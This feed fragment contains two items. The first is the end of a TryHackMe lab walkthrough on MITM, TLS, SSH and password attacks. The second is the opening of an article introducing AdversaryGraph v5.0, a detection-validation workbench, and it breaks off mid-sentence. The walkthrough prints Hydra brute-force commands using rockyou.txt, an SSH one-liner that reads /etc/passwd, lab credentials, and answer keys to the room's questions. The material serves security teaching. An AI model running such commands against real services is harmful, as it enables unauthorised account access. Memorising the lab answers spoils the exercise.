pentests.</li></ul><h4>MITM against encrypted traffic</h4><p>Encryption raises the bar, but it isn’t a magic shield:</p><ul><li><strong>SSL stripping</strong> — quietly downgrade the victim’s connection to plain HTTP while the attacker keeps an HTTPS link to the real server. This is easy to miss if the user never typed <em>“https://”</em> or didn’t check for the padlock icon.</li><li><strong>Fake certificates</strong> — present your own certificate and run two separate encrypted legs. This works if the victim blindly clicks through the browser warning or if a Certificate Authority is compromised.</li><li><strong>Compromised or rogue CAs </strong>— the most serious case. If an attacker controls a trusted CA, they can mint valid-looking certificates for absolutely any domain.</li></ul><h4>Modern defenses</h4><p>A decade of security hardening makes MITM much harder now:</p><ul><li><strong>HTTPS by default</strong> (browsers flag plain HTTP as “Not Secure”)</li><li><strong>HSTS</strong> (forces HTTPS and blocks stripping attacks)</li><li><strong>Certificate Transparency</strong> (public, auditable logs of all issued certificates)</li><li><strong>Certificate pinning</strong> (apps accept only specific, hardcoded keys)</li><li><strong>DANE</strong> (publishing certificate info in DNSSEC-signed DNS)</li></ul><p>MITM still succeeds when users ignore certificate warnings, apps validate keys poorly, the target speaks cleartext, or legacy gear lacks modern features.</p><p>The fundamental fix remains the same: cryptography. You need authentication plus encryption/signing, which is exactly what properly implemented TLS provides.</p><p><strong>Question 1:</strong> How many interfaces does Ettercap offer?</p><pre>Answer: 3</pre><p><strong>Question 2:</strong> How many ways can you invoke Bettercap?</p><pre>Answer: 3</pre><h3>Part 3 — TLS: The Fix for Both Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/622/1*3Qn-dR4Ps9kwTxZGqRBBHw.jpeg"></figure><p>Both sniffing and MITM share one cure: TLS (Transport Layer Security). This part of the room is the solution chapter.</p><h4>A quick history</h4><p>SSL appeared in 1994 via Netscape, with SSL 3.0 dropping in 1996 as the web grew into shopping and payments. TLS succeeded it in 1999.</p><p>Where things stand now:</p><ul><li>SSL 2.0 and 3.0 are deprecated and highly insecure. Never use them.</li><li>TLS 1.0 and 1.1 were officially deprecated in 2021 and dropped by major browsers.</li><li>TLS 1.2 (from 2008) is still widely used and secure when configured with modern ciphers.</li><li>TLS 1.3 (from 2018) is the current standard. It features fewer algorithms, a faster handshake, and forward secrecy by default.</li></ul><p>People still say “SSL certificate” out of habit, but in practice, everything modern uses TLS.</p><h4>Where TLS sits</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Q9wEkyyAKPn28lVN9bDX2Q.png"><figcaption>Image 2 from the room</figcaption></figure><p>Cleartext application-layer protocols send data entirely in the open.</p><p>TLS adds encryption just below the application protocol, wrapping its data before it hits the network card. On the OSI model, it lives right between the transport and application layers.</p><h4>Upgrading protocols with TLS</h4><ul><li>HTTP (Port 80) upgrades to HTTPS (Port 443)</li><li>FTP (Port 21) upgrades to FTPS (Port 990)</li><li>SMTP (Port 25) upgrades to SMTPS (Port 465)</li><li>POP3 (Port 110) upgrades to POP3S (Port 995)</li><li>IMAP (Port 143) upgrades to IMAPS (Port 993)</li></ul><p>It’s not just web and mail. DNS can be wrapped too via DoT (DNS over TLS) on port 853, or DoH (DNS over HTTPS) on port 443. Both stop eavesdroppers from seeing which sites you look up.</p><h4>Implicit TLS vs STARTTLS</h4><ul><li>Implicit TLS uses a dedicated port that is fully encrypted from the very first byte (like 443 or 993).</li><li>STARTTLS connects in cleartext on the normal port, then issues a “STARTTLS” command to upgrade the connection in place. This is common for email setup.</li></ul><blockquote>Both offer encryption, but implicit TLS is highly preferred.</blockquote><p>A MITM attacker can easily strip the STARTTLS command during negotiation and force the session to stay in cleartext if the client isn’t configured to require it.</p><h4>How HTTPS works</h4><p>Plain HTTP takes two steps: open a TCP connection, then send requests. HTTPS inserts a step in between:</p><ol><li>Establish a standard TCP connection.</li><li>Establish a TLS connection (the handshake).</li><li>Send the HTTP requests, which are now fully encrypted.</li></ol><p>A simplified TLS 1.2 handshake goes like this:</p><blockquote><strong>ClientHello</strong> (client offers its TLS versions and cipher suites) <strong>→</strong> <strong>ServerHello</strong> (server picks the parameters and sends its certificate) <strong>→ Key Exchange</strong> (both derive a shared secret)<strong> →</strong> <strong>Finished</strong> (both confirm and switch to encrypted communication):</blockquote><pre>ClientHello → ServerHello → Key Exchange → Finished</pre><h4>Certificates and trust</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/980/1*-10wNzrM0tEpRINoAqc5mQ.png"><figcaption>Certificate Authority (CA)</figcaption></figure><p>HTTPS leans on certificates signed by trusted Certificate Authorities (CAs). Your browser expects a valid certificate from a trusted CA, which proves you’re talking to the real server and blocks easy MITM attempts.</p><p>A certificate shows who it was issued to, who issued it, and its validity period. An expired certificate should never be trusted.</p><p>The modern ecosystem made this nearly universal thanks to automated platforms like <a href="https://letsencrypt.org/"><em>Let’s Encrypt</em></a>, which pushed global HTTPS traffic past 95%.</p><p><strong>Question:</strong> What is the three-letter acronym for the DNS protocol that uses TLS?</p><pre>Answer: DoT (DNS over TLS)</pre><h3>Part 4 — SSH: Secure Remote Administration</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/920/1*EidIDqyfQGBr2l3Y-KLmog.png"><figcaption>SSH</figcaption></figure><p>SSH (Secure Shell) is the secure replacement for Telnet. It is the universal way to administer servers, network gear, and cloud infrastructure.</p><p>The “S” means you can confirm the server’s identity, your messages are encrypted for the intended recipient only, and any data tampering is instantly detectable.</p><blockquote>It handles confidentiality and integrity seamlessly over port 22.</blockquote><h4>Authentication methods</h4><ul><li><strong>Password </strong>— The simplest method. The password rides the encrypted channel, but weak choices can still fall to brute-force attacks.</li><li><strong>Public key (recommended) </strong>— A private key stays on your machine, while the public key goes on the server. The server challenges you to prove you hold the private key without ever transmitting it.</li><li><strong>Certificate-based </strong>— An SSH CA signs user and host keys. This scales incredibly well because you don’t have to manually distribute public keys to every single server.</li><li><strong>MFA </strong>— Combines a traditional key or password with a one-time code for high-security environments.</li></ul><h4>Connecting</h4><ul><li>To connect, you run:</li></ul><pre>ssh mark@MACHINE_IP</pre><p>Enter the password or let your key authenticate, and you are on the remote terminal. Every single command you send runs over an encrypted channel.</p><p><strong>Question:</strong> Connect as mark (password XBtc49AB) and find the kernel release with uname -r.</p><pre>Commands: ssh mark@MACHINE_IP uname -r</pre><pre>Answer: 5.15.0–119-generic</pre><h4>Host key verification</h4><p>On your very first connection, SSH shows the server’s key fingerprint and asks if you want to continue.</p><p>Ideally, you verify this fingerprint through an admin or config management before typing “yes”. It is then saved in your local known_hosts file.</p><p>If that key ever changes unexpectedly in the future, SSH throws a massive warning, a major indicator of a potential MITM attack or a reinstalled server.</p><h4>Generating keys</h4><ul><li>To create a new key pair, run:</li></ul><pre>ssh-keygen -t ed25519 -C "your_email@example.com"</pre><p>The private key stays strictly on your machine and should be passphrase-protected. The public key (.pub) is safe to share. You can push it to a remote server easily using:</p><pre>ssh-copy-id mark@MACHINE_IP</pre><h4>Useful options</h4><pre>+--------------------------------------------+------------------------------------------------------------+<br>| Command                                    | Purpose                                                    |<br>+--------------------------------------------+------------------------------------------------------------+<br>| ssh -p 2222 mark@MACHINE_IP                | Connect to a remote server running on a non-standard port   |<br>| ssh -i ~/.ssh/custom_key mark@MACHINE_IP   | Specify a specific private key file to use for login       |<br>| ssh -J bastion.example.com mark@internal   | Jump through a secure bastion host to reach an internal IP |<br>| ssh -L 8080:localhost:80 mark@MACHINE_IP   | Set up a local port forward to tunnel traffic through SSH  |<br>| ssh -D 9050 mark@MACHINE_IP                | Create a dynamic SOCKS proxy forward for traffic routing   |<br>| ssh mark@MACHINE_IP "cat /etc/passwd"      | Run a single, one-off command without opening a full shell |<br>+--------------------------------------------+------------------------------------------------------------+</pre><h4>Secure file transfer</h4><ul><li><strong>SFTP</strong> — Interactive, FTP-like file management running completely over SSH. This is the recommended choice today.</li><li><strong>SCP </strong>— Simple file copies over SSH. This is now deprecated by OpenSSH in favor of SFTP, though it still works on most systems.</li><li><strong>rsync over SSH </strong>— The best option for large or repeated transfers because it only copies the specific parts of files that changed.</li></ul><p>To copy files via SCP:</p><pre>scp mark@MACHINE_IP:/home/mark/archive.tar.gz ~/ (remote to local)</pre><pre>scp backup.tar.bz2 mark@MACHINE_IP:/home/mark/ (local to remote)</pre><p><strong>Quick clarifier:</strong></p><blockquote>SFTP runs over SSH (port 22).</blockquote><blockquote>FTPS is FTP-over-TLS (port 990).</blockquote><p>They are entirely different protocols despite having similar names.</p><p><strong>Question:</strong> Download book.txt from the remote system; what download size did scp display in KB?</p><pre>Command: scp mark@MACHINE_IP:/home/mark/book.txt ~/</pre><pre>Answer: 415</pre><h4>Hardening SSH</h4><p>To protect a server, you can modify its config file <em>(/etc/ssh/sshd_config)</em>:</p><ul><li>Set PasswordAuthentication to “no” once public keys are established.</li><li>Set PermitRootLogin to “no” to force users to log in with regular accounts first.</li><li>Use AllowUsers or AllowGroups to create an explicit access whitelist.</li><li>Change the default port to reduce automated log noise.</li><li>Deploy fail2ban to automatically block IPs with repeated failed login attempts.</li></ul><h3>Part 5 — Password Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*6_lWVwmNlB93-2JkYWo8Og.png"></figure><p>Even with a network fully encrypted, authentication remains a primary target. Authentication is simply the act of proving your identity, like entering a password to access a service.</p><p>The three factors:</p><ul><li><strong>Something you know </strong>— a password or PIN</li><li><strong>Something you have </strong>— a phone, hardware security key, or smart card</li><li><strong>Something you are </strong>— a fingerprint or facial scan</li></ul><p>This section focuses entirely on attacking “something you know.”</p><h4>Why weak passwords persist</h4><p>Massive historic breaches show that old habits die hard.</p><p>The most common passwords found in modern breaches still include variations like 123456, password, qwerty, Password1, and seasonal choices like Summer2024.</p><p>Because people constantly reuse passwords across multiple sites, a single leak frequently gives attackers access to entirely unrelated corporate or personal accounts.</p><h4>Types of attacks</h4><ul><li><strong>Guessing </strong>— using personal info like a target’s pet, birth year, or favorite sports team harvested from social media.</li><li><strong>Dictionary</strong>— automatically trying lists of real words and common variations.</li><li><strong>Brute force </strong>— systematically trying every possible characters combination. This is exhaustive, which is why password length matters so much.</li><li><strong>Credential stuffing</strong> — taking leaked username/password pairs from old breaches and automatically testing them against other web services.</li><li><strong>Password spraying </strong>— testing one or two incredibly common passwords against a massive list of user accounts to dodge lockout policies.</li><li><strong>Hybrid</strong> — combining dictionary words with systematic patterns, like capitalizing the first letter and adding a year to the end.</li></ul><h4>Wordlists</h4><ul><li>The classic go-to wordlist is RockYou, located on the TryHackMe AttackBox at:</li></ul><pre>/usr/share/wordlists/rockyou.txt</pre><blockquote>Beyond that, security professionals use collections like SecLists, CrackStation lists, or custom-generated lists tailored specifically to the target’s language, region, or industry habits.</blockquote><h4>THC Hydra</h4><p>Hydra is a fast network login cracker that throws wordlists at live services like FTP, POP3, IMAP, SSH, and HTTP.</p><p>The basic syntax looks like this:</p><pre>hydra -l username -P wordlist.txt server service</pre><ul><li>-l specifies a single username (-L for a text file of names)</li><li>-P specifies a password wordlist (-p for a single password)</li><li>server is the target IP or hostname</li><li>service is the protocol you are targeting</li></ul><p>Examples:</p><pre>hydra -l mark -P /usr/share/wordlists/rockyou.txt MACHINE_IP ftp<br>hydra -l frank -P /usr/share/wordlists/rockyou.txt MACHINE_IP ssh<br>hydra -l lazie -P /usr/share/wordlists/rockyou.txt MACHINE_IP imap</pre><p>Handy options include -s to target a non-default port, -vV for detailed verbosity, -t to adjust parallel attack threads, and -f to immediately stop execution when the first valid password is found.</p><h4>Other tools</h4><p>Alternative online crackers include <strong>Medusa</strong> and <strong>Ncrack</strong>.</p><p>For Windows and Active Directory environments, tools like <strong>NetExec</strong> excel at spraying credentials over SMB and LDAP.</p><p>If you manage to dump password hashes from a database, offline tools like <strong>Hashcat</strong> or <strong>John the Ripper </strong>are used because they can guess millions of combinations per second without worrying about network lag or lockouts.</p><h4>Mitigation</h4><p>Defending against password attacks requires a modern approach to identity management:</p><ul><li>Enforce <strong>length-first password policies</strong> based on NIST guidelines. Favor overall length over complex character rotation, and check new passwords against lists of known compromised credentials.</li><li>Implement <strong>strict account lockout</strong> or <strong>throttling mechanisms</strong> to kill automated automated guessing, while remaining aware of password spraying patterns.</li><li>Use <strong>CAPTCHAs</strong> to prevent basic bot execution on login forms.</li><li>Deploy <strong>Multi-Factor Authentication (MFA)</strong> across all external endpoints.</li><li>Transition toward <strong>passwordless ecosystems</strong>, utilizing passkeys (FIDO2/WebAuthn), hardware keys, or verified magic links.</li></ul><p><strong>Question: </strong>One email account is lazie; what password accesses the IMAP service?</p><pre>Command: hydra -l lazie -P /usr/share/wordlists/rockyou.txt MACHINE_IP imap</pre><pre>Answer: butterfly</pre><h3>Key Takeaways</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*35eDunQG0NLCy_K2XVOvtA.jpeg"></figure><p>The fundamental rule of network security is simple:</p><blockquote>Cleartext protocols are inherently insecure.</blockquote><p>Anything sent without encryption can be effortlessly intercepted by sniffing or manipulated via a Man-in-the-Middle attack.</p><p>The security path forward is uniform across all services:</p><ul><li>Use HTTPS instead of HTTP</li><li>Use SSH instead of Telnet</li><li>Use SFTP or FTPS instead of basic FTP</li><li>Use IMAPS, POP3S, and SMTPS instead of their legacy cleartext variants</li></ul><p>Even when a connection is perfectly encrypted, weak passwords remain a glaring vulnerability.</p><p>Secure the protocol with robust encryption, then secure the account with long passwords, rate limiting, and multi-factor authentication.</p><h4>Quick Port Reference Guide</h4><pre>+-------------------+------+----------------+<br>| Protocol          | Port | Security       |<br>+-------------------+------+----------------+<br>| FTP               | 21   | Cleartext      |<br>| FTPS              | 990  | TLS (implicit) |<br>| HTTP              | 80   | Cleartext      |<br>| HTTPS             | 443  | TLS (implicit) |<br>| IMAP              | 143  | Cleartext      |<br>| IMAPS             | 993  | TLS (implicit) |<br>| POP3              | 110  | Cleartext      |<br>| POP3S             | 995  | TLS (implicit) |<br>| SMTP              | 25   | Cleartext      |<br>| SMTP submission   | 587  | STARTTLS       |<br>| SMTPS             | 465  | TLS (implicit) |<br>| SSH / SFTP        | 22   | Encrypted (SSH)|<br>| Telnet            | 23   | Cleartext      |<br>+-------------------+------+----------------+</pre><p><em>Room: Protocols and Servers 2 — TryHackMe (</em><a href="https://tryhackme.com/room/protocolsandservers2"><em>https://tryhackme.com/room/protocolsandservers2</em></a><em>). This writeup is for educational purposes; only test systems you’re authorized to. Have fun!</em></p><p><em>This article was written by Pop123 as a walkthrough for the TryHackMe lab. I am as always open to further discussing the topic.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=42c2d01f5c6c" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/protocols-and-servers-2-tryhackme-writeup-42c2d01f5c6c">Protocols and Servers 2 TryHackMe Writeup</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AdversaryGraph v5.0: From CTI Mapping to Attack Simulation and SIEM Validation]]></title>
<description><![CDATA[A self-hosted CTI-to-detection workbench for ATT&CK mapping, IOC investigation, malware analysis, asset attack-surface mapping, attack simulation, and detection engineering validation.IntroductionAdversaryGraph started as a practical question:How can a security team move from threat intelligence ...]]></description>
<link>https://tsecurity.de/de/3646308/hacking/adversarygraph-v50-from-cti-mapping-to-attack-simulation-and-siem-validation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646308/hacking/adversarygraph-v50-from-cti-mapping-to-attack-simulation-and-siem-validation/</guid>
<pubDate>Sun, 05 Jul 2026 08:22:34 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4><em>A self-hosted CTI-to-detection workbench for ATT&amp;CK mapping, IOC investigation, malware analysis, asset attack-surface mapping, attack simulation, and detection engineering validation.</em></h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pE4s-eX1wFWMUOsnozr16w.png"></figure><h3>Introduction</h3><p>AdversaryGraph started as a practical question:</p><p><strong>How can a security team move from threat intelligence to detection engineering without losing the evidence trail?</strong></p><p>Most CTI workflows produce useful text, but the next steps are often manual. An analyst reads a report, extracts behaviors, maps them to MITRE ATT&amp;CK, compares them with known actors, enriches IOCs, writes detection ideas, and then asks a detection engineer to validate whether telemetry actually exists in the SIEM.</p><p>That gap is where a lot of defensive work slows down.</p><p>AdversaryGraph v5.0 is my attempt to make that workflow more operational. It is not only a CTI visualization project. It is a self-hosted analyst workbench that connects:</p><ul><li><strong>Report and telemetry analysis.</strong></li><li><strong>ATT&amp;CK technique mapping.</strong></li><li><strong>Group, campaign, and report similarity.</strong></li><li><strong>IOC enrichment and investigation.</strong></li><li><strong>Malware analysis workflows.</strong></li><li><strong>Asset attack-surface mapping.</strong></li><li><strong>Attack simulation.</strong></li><li><strong>SIEM forwarding and validation.</strong></li><li><strong>Analyst-ready documentation and reports.</strong></li></ul><p>The main addition in release 5.0 is <strong>Attack Simulation</strong>: a controlled ATT&amp;CK validation workspace where an analyst can select a technique, run approved lab scenarios, inspect target-side telemetry, forward logs to a SIEM collector, and use an AI assistant to generate coherent multi-phase attack-chain drills.</p><p>This article explains what is new in v5.0, how the architecture works, what the platform can do today, and how I expect analysts and detection engineers to use it.</p><p>Project links:</p><ul><li>Project landing page: <a href="https://1200km.com/adversarygraph/">https://1200km.com/adversarygraph/</a></li><li>Documentation: <a href="https://1200km.com/adversarygraph-docs/">https://1200km.com/adversarygraph-docs/</a></li><li>GitHub: <a href="https://github.com/anpa1200/adversarygraph">https://github.com/anpa1200/adversarygraph</a></li><li>Release v5.0.0: <a href="https://github.com/anpa1200/adversarygraph/releases/tag/v5.0.0">https://github.com/anpa1200/adversarygraph/releases/tag/v5.0.0</a></li></ul><h3>Table of Contents</h3><ul><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#e399"><strong>Getting Started</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#cea9"><strong>The Problem: CTI Often Stops Before Validation</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#dfa8"><strong>What AdversaryGraph Is</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#cb81"><strong>Core Capabilities Before v5.0</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#873f"><strong>What Is New in v5.0</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#bca9"><strong>TTP-First Simulation Workflow</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#b2a4"><strong>Real Lab Telemetry for Web Scenarios</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#251c"><strong>SIEM Forwarding</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#a5cc"><strong>AI Attack Assistant</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#3d3e"><strong>Coherent Kill Chains, Not Random Events</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#2f06"><strong>Explain Attack</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#f317"><strong>Named Scenario Library</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#144f"><strong>Safety Boundaries</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#cd7c"><strong>How This Fits Detection Engineering</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#e7d0"><strong>Architecture Overview</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#6252"><strong>Example Use Case: Password Spray Detection</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#231b"><strong>Example Use Case: Web Recon to Exploit-Shaped Telemetry</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#8a5c"><strong>Example Use Case: Malware Findings to Detection Validation</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#dbfb"><strong>Example Use Case: Asset Inventory to Attack Surface</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#8e80"><strong>What This Release Is Not</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#ff3a"><strong>What Makes v5.0 Different</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#e399"><strong>Getting Started</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#22f6"><strong>Final Thoughts</strong></a></li></ul><h3>The Problem: CTI Often Stops Before Validation</h3><p>A typical CTI-to-detection workflow looks like this:</p><ol><li>Read an external report, internal incident report, malware note, or intelligence summary.</li><li>Extract behaviors: PowerShell, scheduled tasks, credential dumping, public-facing application exploitation, exfiltration, persistence, discovery, and so on.</li><li>Map those behaviors to MITRE ATT&amp;CK.</li><li>Compare them with known actor and campaign profiles.</li><li>Identify relevant IOCs.</li><li>Write hunting hypotheses and detection logic.</li><li>Ask whether the SIEM actually receives the required telemetry.</li><li>Test rules with sample logs, lab traffic, or purple-team activity.</li></ol><p>The hard part is not just mapping. The hard part is preserving the chain from <strong>evidence</strong> to <strong>technique</strong> to <strong>telemetry</strong> to <strong>detection validation</strong>.</p><p>If the SIEM parser is broken, the detection will not fire.</p><p>If the event structure is wrong, the rule will not match.</p><p>If the test event is too synthetic, the validation result is misleading.</p><p>If the ATT&amp;CK mapping is not tied back to evidence, the report becomes hard to defend.</p><p>AdversaryGraph v5.0 focuses on this full chain.</p><h3>What AdversaryGraph Is</h3><p>AdversaryGraph is a self-hosted CTI-to-detection platform. It combines a public research interface with a Docker-based private platform.</p><p>The public site is useful for exploration: ATT&amp;CK matrix navigation, group research, public technique context, and project documentation.</p><p>The self-hosted platform is where private work belongs: AI-assisted report analysis, stored investigations, IOC enrichment, malware-analysis workflows, asset inventories, attack simulation, SIEM validation, and API-driven workflows.</p><p>The high-level workflow is:</p><ol><li><strong>Ingest</strong> reports, logs, IOCs, malware findings, asset inventory, or feed data.</li><li><strong>Map</strong> behaviors to ATT&amp;CK with evidence and confidence.</li><li><strong>Enrich</strong> IOCs, actors, campaigns, malware families, and references.</li><li><strong>Validate</strong> coverage using lab telemetry and SIEM forwarding.</li><li><strong>Report</strong> findings in analyst-ready form.</li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*sMubTyaMt5F9zU2t.png"></figure><h3>Core Capabilities Before v5.0</h3><p>Release 5.0 builds on a broader platform. The major existing modules are still part of the release and matter because Attack Simulation is designed to connect to them.</p><p><strong>All capabilities here:</strong></p><p><a href="https://1200km.com/adversarygraph-docs/capabilities/">Platform Capabilities | AdversaryGraph Documentation - CTI-to-Detection Workbench | 1200km</a></p><h4>AI-Assisted ATT&amp;CK Mapping</h4><p>Analysts can paste text or upload reports and ask the configured LLM provider to extract ATT&amp;CK candidates. The platform supports multiple provider options, including Claude, OpenAI, Gemini, MiniMax, and local OpenAI-compatible gateways.</p><p>The important part is not simply “ask AI for TTPs.” The useful part is that mappings are treated as analyst-assistance data:</p><ul><li>Techniques are shown with evidence.</li><li>Confidence is visible.</li><li>Output can be reviewed before operational use.</li><li>Extracted TTPs can be pushed into the Navigator.</li><li>Results can be compared with groups, campaigns, and stored reports.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*YMWb4u7m0Ogpsb6T.png"></figure><h4>ATT&amp;CK Navigator and Group Context</h4><p>The Navigator is the central workspace for technique review. It supports Enterprise, Mobile, ICS, and ATLAS-style workflows. Analysts can search techniques, build layers, overlay group context, import/export layers, and move selected TTPs into comparison and reporting workflows.</p><p>This matters because many teams already think in ATT&amp;CK, but their toolchain is split between reports, spreadsheets, diagrams, SIEM rules, and ticketing systems. AdversaryGraph tries to keep the matrix connected to the rest of the investigation.</p><h4>Group, Campaign, and Report Similarity</h4><p>AdversaryGraph uses TTP overlap as a way to generate hypotheses. It compares selected behavior against ingested group profiles, campaigns, and stored report libraries.</p><p>This is intentionally framed as similarity, not attribution.</p><p>TTP overlap can help prioritize research. It can suggest which actor profiles or campaigns deserve review. It is not proof that a specific actor is responsible for an intrusion.</p><h4>IOC Investigation</h4><p>The IOC workflow lets analysts pivot from observable data into reputation and relationship context. IPs, domains, URLs, hashes, and other observables can be investigated with feed context and ATT&amp;CK leads.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*SHhDv7Qw2exVtviQ.png"></figure><h4>Malware Analysis</h4><p>The Malware Analysis module connects static triage, hash checks, unpacking, strings, decompilation/debug views, runtime-gated analysis, and AI summaries back to the CTI workflow.</p><p>The point is not to replace a reverse engineer. The point is to help analysts preserve malware-derived evidence and map it into ATT&amp;CK, IOCs, and investigation outputs.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*W0QBOK9La3Q3mirM.png"></figure><h4>Asset Attack-Surface Mapping</h4><p>AdversaryGraph can ingest asset inventory input, normalize assets, score exposure, propose likely entry points, and map asset-driven ATT&amp;CK candidates.</p><p>This is useful when the question is not “what did the attacker do?” but “what could an attacker realistically try against my exposed environment?”</p><p>Examples:</p><ul><li>Public web applications.</li><li>VPN and identity services.</li><li>Exposed admin panels.</li><li>Cloud assets.</li><li>Remote management services.</li><li>High-value internal systems.</li><li>Scanner and CMDB exports.</li></ul><h3>What Is New in v5.0</h3><p>The headline feature is <strong>Attack Simulation</strong>.</p><p>Attack Simulation is designed for defensive validation and detection engineering. It lets analysts work from a TTP-first interface, run safe simulations, inspect telemetry, and forward events to a SIEM.</p><p>This is not an exploitation framework. It does not run malware. It does not execute arbitrary commands against arbitrary user targets. It is a controlled validation workspace for authorized lab scenarios and source-shaped telemetry drills.</p><p>The v5.0 release adds:</p><ul><li>A new Attack Simulation workspace.</li><li>ATT&amp;CK-style matrix selection for runnable simulations.</li><li>Dedicated configuration pages per selected TTP.</li><li>Built-in lab web target for web-focused scenarios.</li><li>Target-side real-time log viewing.</li><li>SIEM forwarding to HTTP(S) collectors.</li><li>Saved recent SIEM destinations.</li><li>AI Attack Assistant.</li><li>“Challenge Me” mode.</li><li>Complicated multi-source attack-chain scenarios.</li><li>25 named coherent scenario templates.</li><li>Attack-chain graph.</li><li>Explain Attack panel.</li><li>Source-shaped Windows, Sysmon, EDR, DNS, proxy, firewall, web, and WAF event generation for SIEM parser and rule validation.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*6nP-gwkSId3d917_.png"></figure><h3>TTP-First Simulation Workflow</h3><p>The workflow starts with the ATT&amp;CK matrix.</p><p>Runnable simulation cells are visible directly in the matrix, and related TTP pages can link back into the simulation workflow. This keeps the analyst oriented around ATT&amp;CK instead of hiding simulations behind unrelated forms.</p><p>The basic flow is:</p><ol><li>Open Attack Simulation.</li><li>Choose a TTP from the matrix.</li><li>Open the dedicated simulation page.</li><li>Review what the scenario does.</li><li>Review telemetry source and event structure.</li><li>Run the lab scenario or AI-assisted telemetry drill.</li><li>Inspect logs in real time.</li><li>Forward selected logs to the SIEM.</li><li>Confirm whether detections fired.</li><li>Record validation gaps.</li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*1RZJyK6gkRejmuv0.png"></figure><p>Each scenario explains:</p><ul><li>What happens.</li><li>What adversary behavior is represented.</li><li>Which system emits telemetry.</li><li>Which event structures are expected.</li><li>What the detection should focus on.</li><li>Which telemetry is production-like and which is a lab canary.</li><li>What the validation gaps are.</li></ul><p>That explanation is important. A simulation without context is just noise. A simulation with context becomes a detection-engineering exercise.</p><h3>Real Lab Telemetry for Web Scenarios</h3><p>One major design goal was to avoid fake “log generation” for web scenarios where a real lab target can safely produce logs.</p><p>For web-focused simulations, the Docker deployment includes an attack-lab-web target. The AdversaryGraph API sends real HTTP requests to that lab web server over the Docker network. The target server writes its own logs.</p><p>The analyst can then inspect real target-side telemetry such as:</p><ul><li>NGINX access logs.</li><li>NGINX error logs.</li><li>Application authentication logs.</li><li>WAF/security-style logs.</li><li>Structured web JSONL telemetry.</li><li>Run-specific JSONL logs.</li><li>Merged attacked-server events.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/988/0*CPDdyF-3kyqCleFB.png"></figure><p>This is different from simply printing a row that looks like an access log. The request is sent to the lab server, and the server emits the log.</p><p>Supported web-focused scenarios 